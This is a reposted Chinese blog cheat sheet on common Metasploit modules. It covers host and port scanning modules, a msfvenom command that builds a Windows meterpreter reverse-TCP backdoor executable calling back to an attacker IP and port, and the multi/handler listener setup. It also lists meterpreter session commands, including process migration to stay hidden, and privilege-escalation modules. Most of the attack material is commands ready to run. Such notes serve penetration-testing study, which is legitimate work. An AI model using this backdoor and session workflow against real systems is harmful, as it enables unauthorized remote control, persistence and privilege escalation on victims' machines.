0


msf常用模块功能整理

更新中

一.基础:

shell中直接输入msfconsole开始运行

  • use +模块路径 使用模块
  • search+模块关键字 用来搜索模块
  • back 返回主界面

模块中:

  • info 查看模块信息
  • show options 查看模块设置项
  • show targets 显示可选择的target(targert更像是给你选项,你去细化攻击细节,但是明明目标机器是64位系统,我选择target为64攻击不匹配,但是选择86却攻击成功,为什么呢?这个问题解决了,因为生成木马的时候会有生成64位还是32位的选项,默认是32位,也就是×86,因为木马是×86,既然x86的木马执行成功了,选择target自然也是x86
  • expolit/run 开始执行

高级设置:

set AutoRunScript migrate -f 自动迁移进程

二.信息收集:

主机存活探测:auxiliary/scanner/discovery/arp_sweep ARP 扫描auxiliary/scanner/discovery/udp_sweep UDP 扫描auxiliary/scanner/netbios/nbname NETBIOS 扫描auxiliary/scanner/snmp/snmp_enum SNMP 扫描auxiliary/scanner/smb/smb_version SMB 扫描端口扫描:auxiliary/scanner/portscan/ack TCP ACK 端口扫描auxiliary/scanner/portscan/ftpbounce FTP bounce 端口扫描auxiliary/scanner/portscan/syn SYN 端口扫描auxiliary/scanner/portscan/tcp TCP 端口扫描auxiliary/scanner/portscan/xmas TCP XMas 端口扫描

使用方法:1.用内网的机器开个代理,使kali的流量可以到达内网,然后使用模块扫描2.使用后门连接,通过session进行扫描3.在同一个内网里面可以直接扫描(一般不会有这种情况吧,除非我带着电脑潜入目标地点)这三点适用于内网渗透的很多场景

三.渗透

3.1反向后门的使用

我的话:

反弹shell是等受害机器来连接我,所以我在这里的设置,不需要去设置受害机器的ip,因为只要受害机器知道来哪里找我就行了

生成反向后门:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.43 lport=18888 -f exe >gg.exe

高亮为可设置参数,

lhost是监听机ip地址(也就是攻击者kali的ip地址)lport是监听端口(也就是攻击者准备接收反弹回来的shell的那个端口)

监听后门:

use exploit/multi/handler

use exploit/multi/handler   #通过use选择监听模块
set payload windows/meterpreter/reverse_tcp  #选择设置反弹shell的监听(这一步我有几次忽略了,导致出现错误,连接失败,所以这一步一定不要落下,设置监听的类型)
set lhost 192.168.43.43   #这里的ip和端口应该和后门代码保持一致
set lport 18888
exploit   #开始执行

meterpreter

获取到shell后,会为被控制的机器开启一个session(会话),msf可以同时监听多个session,并且在不同的session之间随意切换,黑客在session中执行命令等同于在目标主机执行命令,也可以使用msf的攻击模块通过session对目标主机进行攻击。在session中执行命令的模式也被称为meterpreter模式

session中:

 getuid #获取当前用户的权限吧,看演示里面一般是作这个用的
 migrate [进程号] #将后门进程迁移到其它进程里面,达到权限维持的效果(更不容易被发现)
 help        #可以显示在meterpreter模式下可以操作的指令列表(一部分)
 search [-d dir] [-r recurse] -f pattern   #在被控制的机器内搜索文件
 shell   #得到终端
 background     #把session放置后台
 ps    #列出所有进程,以及进程的信息(在这里可以看到pid,知道pid就可以使用kill来终止进程了)

session外:

session -l  #列出当前的所有session以及其信息
sessions -K   #关闭所有session连接,这里的k是大写
sessions -k [指定session的id]  #杀死指定id的session
sessions [id号]  #根据id号进入不同的session

3.2提权

补丁查询:

run post/windows/gather/enum_patches 查询补丁信息use post/multi/recon/local_exploit_suggester 这个模块可通过session查询当前可以用来提权的exp,(可能会失灵)


本文转载自: https://blog.csdn.net/m0_55306747/article/details/125913508
版权归原作者 一晓风 所有, 如有侵权,请联系我们删除。

“msf常用模块功能整理”的评论:

还没有评论